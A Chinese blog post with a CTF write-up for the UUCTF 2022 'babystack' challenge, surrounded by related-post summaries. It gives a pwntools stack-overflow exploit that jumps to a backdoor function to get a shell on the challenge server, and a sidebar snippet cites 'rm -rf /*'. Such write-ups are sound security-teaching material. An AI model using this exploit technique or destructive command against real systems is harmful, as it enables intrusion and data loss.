[UUCTF 2022 新生赛]babystack WP

最新推荐文章于 2024-07-26 01:09:10 发布

qwq404.

最新推荐文章于 2024-07-26 01:09:10 发布

阅读量87

点赞数

文章标签： linux python

本文链接：https://blog.csdn.net/m0_74154810/article/details/131827487

版权

简单的栈溢出问题

利用Exeinfo查看，发现是64位的

放入64位的ida查看代码

未发现危险函数，所以点击函数去查看里面的内容，前面都是调用的系统函数，直到vuln有所发现

read函数存在栈溢出漏洞，栈空间为（+0h）-（-100h）=100

接着找到后门函数，得到它的地址，那么就可以开始编写脚本

from pwn import *

p=remote('node3.anna.nssctf.cn',28667)#连接

payload=b'a'*(0x100+8)+p64(0x400726)#这里我放入a将数组填满，再跟上后门函数的地址

p.sendline(payload)#发送攻击负载

p.interactive()

注意如果一开始（0x100）没有效果，再试试（0x100+8），这里是64位+8，32位+4

p64用于64位，p32用于32位，自己调整

用python运行后发现已经可以执行命令了

cat一下即可得到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

qwq404.

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
[UUCTF 2022 新生赛]babystack WP

[UUCTF 2022 新生赛]babystack,简单栈溢出问题
复制链接

扫一扫

【pwn】[UUCTF 2022 新生赛]easystack --pie爆破

question55的博客

11-12

309

查看程序保护发现开了pie：partial write(部分写入)就是一种利用PIE技术缺陷的bypass技术。由于内存的页载入机制，PIE的随机化只能影响到单个内存页。通常来说，一个内存页大小为0x1000，这就意味着不管地址怎么变，某条指令的后12位，3个十六进制数的地址是始终不变的。因此通过覆盖EIP的后8或16位 (按字节写入，每字节8位)就可以快速爆破或者直接劫持EIP简单来说就是后12位是不会被随机化的，接着看代码逻辑发现有个后门的函数可以getshell，但是问题是怎么溢出到这里，vuln函数

[UNCTF 2020]Pwn方向

Nashi_Ko的博客

11-14

356

直接在linux使用指令nc 45.158.33.12 8000 from pwn import * io = remote('45.158.33.12',8000) payload = 'chcp 65001' io.sendline(payload) print(io.recv()) 运行脚本得到flag

1 条评论您还未登录，请先登录后发表或查看评论

[UUCTF 2022 新生赛]ez_rce

m0_73612768的博客

01-03

1068

反引号命令执行；shell 绕过关键字过滤；

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce

weixin_46497491的博客

11-07

3899

[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce

对于一些CTF比赛写的wp.zip

09-30

比赛项目源码

ISCC2022题目附件

06-06

信息安全与对抗技术竞赛（ISCC：Information Security and Countermeasures Contest），于2004年首次举办（国内第一），2022年大学生竞赛为第19届，中小学生信息安全对抗赛为第11届，河南赛区为第10届，广西赛区为第...

2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 wp 解题思路

08-17

2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 WP 解题思路本资源为2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题的 WP 解题思路，涵盖了四个题目，分别为蓝01-取证、蓝02-取证、蓝03-取证...

网鼎杯2022白虎组题目分享

09-06

逆向，pwn，misc，加解密题目，网鼎杯2022，白虎组，ctf

Wp.rar_wp

09-14

标题中的"Wp.rar_wp"可能是指一个名为"Wp"的RAR压缩文件，后缀"_wp"可能是用户为了标记或区分该文件而添加的自定义标识。这个压缩包内容与但丁滤波器设计有关，是一种在信号处理领域广泛应用的技术。在描述中提到...

Linux初学基本命令

yuan20010401的博客

07-25

376

1、rm 文件名称删除多个文件多个目录需要用空格删除根目录（rm -rf /*）1、touch 文件名字用于linux创建文件创建多个目录需要用空格隔开。2、mkdir 目录名称用于创建文件夹创建多个嵌套文件夹需要用/隔开。1、cp 当前文件其他目录名称拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称查看文件更多内容。1、mv 原文件路径目标文件路径。退出保存时按Esc + :wq。

linux上导出数据库

weixin_43652507的博客

07-24

329

linux上导出数据库 MySQL、PostgreSQL、SQLite、MongoDB

【linux】Shell脚本三剑客之awk命令的详细用法攻略

景天科技苑

07-24

4474

在Linux和Unix系统中，awk是一种强大的文本处理工具，广泛应用于数据提取、分析和报告生成。它基于模式匹配和条件执行，能够逐行读取输入文本文件，并对每行数据执行指定的操作。本教程将详细介绍`awk`在shell脚本中的用法，包括其基本语法、常用选项、内置变量、高级特性以及结合shell脚本的实际案例。

Linux中vim的基本介绍和使用

2301_79194984的博客

07-24

1261

如果我面想要在Linux上编写代码的话，我就需要vim来帮助我们编写代码。但是vim并不像是在Windows上的vs集成软件把所有的东西都集成起来但是呢，如果不进行配置的话，vim和其他是相互独立的，vim就是写代码的编辑器，编译代码就是gcc/g++的编译器，调试代码就有gdb的调试器。自动化构建就有make和makefile构建的工具。vim是款编辑器，同时也是多模式的编辑器—命令模式，底行模式，插入模式。简单编译一个hello vim程序。

【Linux】管道通信和 system V 通信

Front123456的博客

07-24

836

因为它们的第一个字段 ipc_perm 是一样的，所以可以维护一个 struct ipc_perm* 的指针数组，存共享内存、消息队列、信号量它们三者中，第一个元素的地址，也就是 &ipc_perm。这样就可以把共享内存、消息队列和信号量三个部分直接管理起来了。而我们知道结构体的第一个成员的地址和结构体对象的地址在数值上是相同的，并且操作系统在内部可以识别这个对象是共享内存、消息队列和信号量中的哪一个，因此我们拿到这个数组中的 ipc_perm 地址便能访问这结构体的其它成员，将它们管理起来

Linux-管道与输入输出重定向

weixin_57370131的博客

07-24

279

【代码】Linux-管道与输入输出重定向。

(leetcode学习)110. 平衡二叉树

m0_54888411的博客

07-24

405

很久没写结构体了，复习一下。学习二叉树的通用解题方法。给定一个二叉树，判断它是否是。

【C语言】Linux 飞翔的小鸟

Minuhy

07-22

719

在Linux下运行的，用C语言编写的飞翔的小鸟，一款挺无聊的小游戏，分享给大家~

【Linux】远程连接Linux虚拟机（MobaXterm）